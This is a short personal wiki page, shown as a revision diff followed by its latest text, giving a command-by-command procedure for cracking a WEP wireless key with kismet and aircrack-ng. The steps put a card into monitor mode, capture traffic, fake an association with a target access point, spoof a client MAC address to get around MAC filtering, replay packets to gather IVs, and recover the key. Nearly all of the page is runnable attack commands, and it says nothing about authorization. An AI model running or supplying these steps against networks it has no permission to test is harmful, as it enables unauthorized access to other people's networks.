Difference between revisions of "Cracking A WEP Key"

From Nearline Storage
Jump to navigation Jump to search
m
m
 
(One intermediate revision by the same user not shown)
Line 1: Line 1:
 +
See http://www.aircrack-ng.org/doku.php?id=tutorial
 +
 
*Install kismet, kismet-plugins and aircrack-ng packages
 
*Install kismet, kismet-plugins and aircrack-ng packages
 
*Use kismet to get the channel, ESSid, and BSSid for the access point to be cracked
 
*Use kismet to get the channel, ESSid, and BSSid for the access point to be cracked
Line 25: Line 27:
 
*Ctrl-C the dump process and crack the key:
 
*Ctrl-C the dump process and crack the key:
 
   aircrack-ng dumpfile.ivs
 
   aircrack-ng dumpfile.ivs
 +
 +
[[Category:Networking]]

Latest revision as of 15:37, 31 December 2019

See http://www.aircrack-ng.org/doku.php?id=tutorial

  • Install kismet, kismet-plugins and aircrack-ng packages
  • Use kismet to get the channel, ESSid, and BSSid for the access point to be cracked

These tools are fussy about the hex addresses, include leading zeros and don't use lower case hex digits

  • Become root:
 su -
  • Put NIC into monitor mode:
 airmon-ng start wlan0
  • Start capturing packets:
 airodump-ng -w dumpfile --channel <channel> mon0


If you don't get enough traffic from the access point on that channel. start a new terminal session:

  • Associate with the target AP
 aireplay-ng -1 0 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0

If that doesn't associate successfully then it may be that they have MAC filtering turned on. Observe the dump output for a while until you see a client associate successfully. Take its MAC address and substitute that for -h.

  • Start replaying packets so that we can collect more packets:
 aireplay-ng -3 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0

Watch the Data column in the airodump-ng session, we want more than 100,000 unique IV headers.

  • Ctrl-C the dump process and crack the key:
 aircrack-ng dumpfile.ivs